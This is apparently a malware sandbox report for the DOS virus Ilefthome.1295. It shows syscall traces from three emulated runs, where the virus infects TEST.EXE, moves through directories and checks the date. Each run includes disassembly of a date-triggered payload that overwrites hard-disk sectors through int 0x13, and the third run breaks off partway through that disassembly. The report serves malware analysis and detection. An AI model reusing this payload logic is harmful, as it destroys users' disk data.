Sample viewer

vx.netlux.org/Virus.DOS.Ilefthome.1295

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:44:46.32049511Z 25 PC: 12b88 | Get default drive
2018-12-17T22:44:46.322224987Z 71 PC: 12b9b | Get current directory
2018-12-17T22:44:46.326402148Z 26 PC: 12ba3 | Set disk transfer address
2018-12-17T22:44:46.328110925Z 78 PC: 12bd7 | Find first file
2018-12-17T22:44:46.335027752Z 61 PC: 12bf4 | Open file (Filename = 'TEST.EXE')
2018-12-17T22:44:46.341472996Z 63 PC: 12c03 | Read file or device (Read 2 bytes on handle 5)
2018-12-17T22:44:46.343956041Z 62 PC: 12c07 | Close file
2018-12-17T22:44:46.345964491Z 67 PC: 12c25 | Get or set file attributes
2018-12-17T22:44:46.362760949Z 61 PC: 12c33 | Open file (Filename = 'TEST.EXE')
2018-12-17T22:44:46.371269993Z 63 PC: 12c43 | Read file or device (Read 28 bytes on handle 5)
2018-12-17T22:44:46.374032893Z 66 PC: 12c73 | Move file pointer
2018-12-17T22:44:46.376363286Z 64 PC: 12c7e | Write file or device (Write 256 bytes on handle 5)
2018-12-17T22:44:46.384482009Z 64 PC: 12c89 | Write file or device (Write 350 bytes on handle 5)
2018-12-17T22:44:46.394182492Z 64 PC: 12c94 | Write file or device (Write 689 bytes on handle 5)
2018-12-17T22:44:46.404621889Z 66 PC: 12cdd | Move file pointer
2018-12-17T22:44:46.406591253Z 66 PC: 12cf5 | Move file pointer
2018-12-17T22:44:46.408470767Z 64 PC: 12d00 | Write file or device (Write 28 bytes on handle 5)
2018-12-17T22:44:46.413136501Z 87 PC: 12d15 | Get or set file date and time
2018-12-17T22:44:46.415166215Z 62 PC: 12d19 | Close file
2018-12-17T22:44:46.439536174Z 67 PC: 12d29 | Get or set file attributes
2018-12-17T22:44:46.450234327Z 59 PC: 12e04 | Change current directory
2018-12-17T22:44:46.454872434Z 78 PC: 12bd7 | Find first file
2018-12-17T22:44:46.461072378Z 79 PC: 12bdf | Find next file
2018-12-17T22:44:46.464624124Z 59 PC: 12e04 | Change current directory
2018-12-17T22:44:46.466891589Z 78 PC: 12bd7 | Find first file
2018-12-17T22:44:46.472932324Z 79 PC: 12bdf | Find next file
2018-12-17T22:44:46.475999795Z 59 PC: 12e04 | Change current directory
2018-12-17T22:44:46.478150461Z 78 PC: 12bd7 | Find first file
2018-12-17T22:44:46.488841429Z 79 PC: 12bdf | Find next file
2018-12-17T22:44:46.491446818Z 59 PC: 12e04 | Change current directory
2018-12-17T22:44:46.494521617Z 78 PC: 12bd7 | Find first file
2018-12-17T22:44:46.505756643Z 79 PC: 12bdf | Find next file
2018-12-17T22:44:46.508579539Z 42 PC: 12d7e | Get date 0x12d7e: cmp dx, 0x909
0x12d82: jne 0x12dff
0x12d84: mov ah, 8
0x12d86: int 0x13
0x12d88: xchg dh, dl
0x12d8a: xor dh, dh
0x12d8c: mov si, dx
0x12d8e: mov dh, 0
0x12d90: mov dl, 0x80
0x12d92: mov cx, 1
0x12d95: cli
0x12d96: mov ax, 0x30f
0x12d99: int 0x13
0x12d9b: inc dh
0x12d9d: inc ch
0x12d9f: dec si
0x12da0: jne 0x12d95
0x12da2: mov ax, 0xd
0x12da5: int 0x10
0x12da7: mov ah, 0xe
2018-12-17T22:44:46.510978698Z 59 PC: 12d5d | Change current directory
2018-12-17T22:44:46.514927256Z 26 PC: 12d6d | Set disk transfer address
2018-12-17T22:44:46.51601684Z 9 PC: 12ac8 | Display string (Could not find end pointer)
2018-12-17T22:44:46.531441677Z 76 PC: 12acc | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":8319,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:04:19.65284994Z 25 PC: 12b88 | Get default drive
2018-12-25T12:04:19.654029979Z 71 PC: 12b9b | Get current directory
2018-12-25T12:04:19.656119192Z 26 PC: 12ba3 | Set disk transfer address
2018-12-25T12:04:19.657108218Z 78 PC: 12bd7 | Find first file
2018-12-25T12:04:19.661344761Z 61 PC: 12bf4 | Open file (Filename = 'TEST.EXE')
2018-12-25T12:04:19.665472689Z 63 PC: 12c03 | Read file or device (Read 2 bytes on handle 5)
2018-12-25T12:04:19.667113658Z 62 PC: 12c07 | Close file
2018-12-25T12:04:19.668495759Z 67 PC: 12c25 | Get or set file attributes
2018-12-25T12:04:20.74042517Z 61 PC: 12c33 | Open file (Filename = 'TEST.EXE')
2018-12-25T12:04:20.748061711Z 63 PC: 12c43 | Read file or device (Read 28 bytes on handle 5)
2018-12-25T12:04:20.752266612Z 66 PC: 12c73 | Move file pointer
2018-12-25T12:04:20.753682898Z 64 PC: 12c7e | Write file or device (Write 256 bytes on handle 5)
2018-12-25T12:04:20.850911868Z 64 PC: 12c89 | Write file or device (Write 350 bytes on handle 5)
2018-12-25T12:04:20.959331197Z 64 PC: 12c94 | Write file or device (Write 689 bytes on handle 5)
2018-12-25T12:04:20.984638212Z 66 PC: 12cdd | Move file pointer
2018-12-25T12:04:20.985939054Z 66 PC: 12cf5 | Move file pointer
2018-12-25T12:04:20.987057866Z 64 PC: 12d00 | Write file or device (Write 28 bytes on handle 5)
2018-12-25T12:04:20.990060287Z 87 PC: 12d15 | Get or set file date and time
2018-12-25T12:04:20.991295181Z 62 PC: 12d19 | Close file
2018-12-25T12:04:20.9965394Z 67 PC: 12d29 | Get or set file attributes
2018-12-25T12:04:21.003300203Z 59 PC: 12e04 | Change current directory
2018-12-25T12:04:21.006059726Z 78 PC: 12bd7 | Find first file (See above)
2018-12-25T12:04:21.009783195Z 79 PC: 12bdf | Find next file
2018-12-25T12:04:21.011716167Z 59 PC: 12e04 | Change current directory (See above)
2018-12-25T12:04:21.013006159Z 78 PC: 12bd7 | Find first file (See above)
2018-12-25T12:04:21.016730209Z 79 PC: 12bdf | Find next file (See above)
2018-12-25T12:04:21.018936023Z 59 PC: 12e04 | Change current directory (See above)
2018-12-25T12:04:21.020200588Z 78 PC: 12bd7 | Find first file (See above)
2018-12-25T12:04:21.026943287Z 79 PC: 12bdf | Find next file (See above)
2018-12-25T12:04:21.028803726Z 59 PC: 12e04 | Change current directory (See above)
2018-12-25T12:04:21.030092695Z 78 PC: 12bd7 | Find first file (See above)
2018-12-25T12:04:21.036775639Z 79 PC: 12bdf | Find next file (See above)
2018-12-25T12:04:21.038309046Z 42 PC: 12d7e | Get date 0x12d7e: cmp dx, 0x909
0x12d82: jne 0x12dff
0x12d84: mov ah, 8
0x12d86: int 0x13
0x12d88: xchg dh, dl
0x12d8a: xor dh, dh
0x12d8c: mov si, dx
0x12d8e: mov dh, 0
0x12d90: mov dl, 0x80
0x12d92: mov cx, 1
0x12d95: cli
0x12d96: mov ax, 0x30f
0x12d99: int 0x13
0x12d9b: inc dh
0x12d9d: inc ch
0x12d9f: dec si
0x12da0: jne 0x12d95
0x12da2: mov ax, 0xd
0x12da5: int 0x10
0x12da7: mov ah, 0xe
2018-12-25T12:04:21.040119623Z 59 PC: 12d5d | Change current directory
2018-12-25T12:04:21.045733454Z 26 PC: 12d6d | Set disk transfer address
2018-12-25T12:04:21.046643851Z 9 PC: 12ac8 | Display string (Could not find end pointer)
2018-12-25T12:04:21.055029848Z 76 PC: 12acc | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":9,"Month":9,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":8319,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:04:19.917212283Z 25 PC: 12b88 | Get default drive
2018-12-25T12:04:19.918771036Z 71 PC: 12b9b | Get current directory
2018-12-25T12:04:19.921574097Z 26 PC: 12ba3 | Set disk transfer address
2018-12-25T12:04:19.922748545Z 78 PC: 12bd7 | Find first file
2018-12-25T12:04:19.928998356Z 61 PC: 12bf4 | Open file (Filename = 'TEST.EXE')
2018-12-25T12:04:19.935421004Z 63 PC: 12c03 | Read file or device (Read 2 bytes on handle 5)
2018-12-25T12:04:19.937830773Z 62 PC: 12c07 | Close file
2018-12-25T12:04:19.939766751Z 67 PC: 12c25 | Get or set file attributes
2018-12-25T12:04:19.958433468Z 61 PC: 12c33 | Open file (Filename = 'TEST.EXE')
2018-12-25T12:04:19.969542119Z 63 PC: 12c43 | Read file or device (Read 28 bytes on handle 5)
2018-12-25T12:04:19.975763428Z 66 PC: 12c73 | Move file pointer
2018-12-25T12:04:19.977832878Z 64 PC: 12c7e | Write file or device (Write 256 bytes on handle 5)
2018-12-25T12:04:19.986892693Z 64 PC: 12c89 | Write file or device (Write 350 bytes on handle 5)
2018-12-25T12:04:19.994918432Z 64 PC: 12c94 | Write file or device (Write 689 bytes on handle 5)
2018-12-25T12:04:20.003006476Z 66 PC: 12cdd | Move file pointer
2018-12-25T12:04:20.004329157Z 66 PC: 12cf5 | Move file pointer
2018-12-25T12:04:20.005575436Z 64 PC: 12d00 | Write file or device (Write 28 bytes on handle 5)
2018-12-25T12:04:20.008608026Z 87 PC: 12d15 | Get or set file date and time
2018-12-25T12:04:20.009970252Z 62 PC: 12d19 | Close file
2018-12-25T12:04:20.021897887Z 67 PC: 12d29 | Get or set file attributes
2018-12-25T12:04:20.03328764Z 59 PC: 12e04 | Change current directory
2018-12-25T12:04:20.037733152Z 78 PC: 12bd7 | Find first file (See above)
2018-12-25T12:04:20.043938244Z 79 PC: 12bdf | Find next file
2018-12-25T12:04:20.048557654Z 59 PC: 12e04 | Change current directory (See above)
2018-12-25T12:04:20.050399844Z 78 PC: 12bd7 | Find first file (See above)
2018-12-25T12:04:20.056642533Z 79 PC: 12bdf | Find next file (See above)
2018-12-25T12:04:20.059843302Z 59 PC: 12e04 | Change current directory (See above)
2018-12-25T12:04:20.061927998Z 78 PC: 12bd7 | Find first file (See above)
2018-12-25T12:04:20.067896785Z 79 PC: 12bdf | Find next file (See above)
2018-12-25T12:04:20.070573926Z 59 PC: 12e04 | Change current directory (See above)
2018-12-25T12:04:20.072456183Z 78 PC: 12bd7 | Find first file (See above)
2018-12-25T12:04:20.07821056Z 79 PC: 12bdf | Find next file (See above)
2018-12-25T12:04:20.080532529Z 42 PC: 12d7e | Get date 0x12d7e: cmp dx, 0x909
0x12d82: jne 0x12dff
0x12d84: mov ah, 8
0x12d86: int 0x13
0x12d88: xchg dh, dl
0x12d8a: xor dh, dh
0x12d8c: mov si, dx
0x12d8e: mov dh, 0
0x12d90: mov dl, 0x80
0x12d92: mov cx, 1
0x12d95: cli
0x12d96: mov ax, 0x30f
0x12d99: int 0x13
0x12d9b: inc dh
0x12d9d: inc ch
0x12d9f: dec si
0x12da0: jne 0x12d95
0x12da2: mov ax, 0xd
0x12da5: int 0x10
0x12da7: mov ah, 0xe